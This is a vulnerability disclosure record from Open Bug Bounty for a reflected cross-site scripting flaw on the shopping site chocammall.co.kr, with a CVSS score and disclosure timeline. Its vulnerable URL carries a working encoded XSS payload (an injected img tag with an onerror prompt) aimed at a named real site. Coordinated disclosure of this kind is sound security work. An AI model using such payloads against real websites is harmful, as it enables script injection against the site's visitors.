chocammall.co.kr XSS vulnerability

Description

##### Open Bug Bounty ID: OBB-405069

Description| Value
---|---
Affected Website:| chocammall.co.kr
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

##### Vulnerable URL:

`http://www.chocammall.co.kr/shop/base/product/listNewProduct.do?curCateMenuIdx=&curTopMenuIdx;=%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E1000&mainSearchKeyword;=&cur;_menu_cd=007&cur;_menu_title=%25EB%25A0%2588%25EC%25A0%2580%2F%25EC%259E%2590%25EB%258F%2599%25EC%25B0%25A8⊂_menu_cd=007&cur;_menu_tp=&under;_disp_lvl=1&sort;_sql=5&__next_page=http%3A%2F%2Fwww.chocammall.co.kr%2Fshop%2Fbase%2Fevent%2FdailyChkEvent.do`

##### Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 10 November, 2017 06:48 GMT
Vulnerability Verified:| 10 November, 2017 10:18 GMT
Website Operator Notified:| 10 November, 2017 10:18 GMT
Vulnerability Published:| 10 November, 2017 10:18 GMT [without any technical details]
Public Disclosure:| 8 February, 2018 06:48 GMT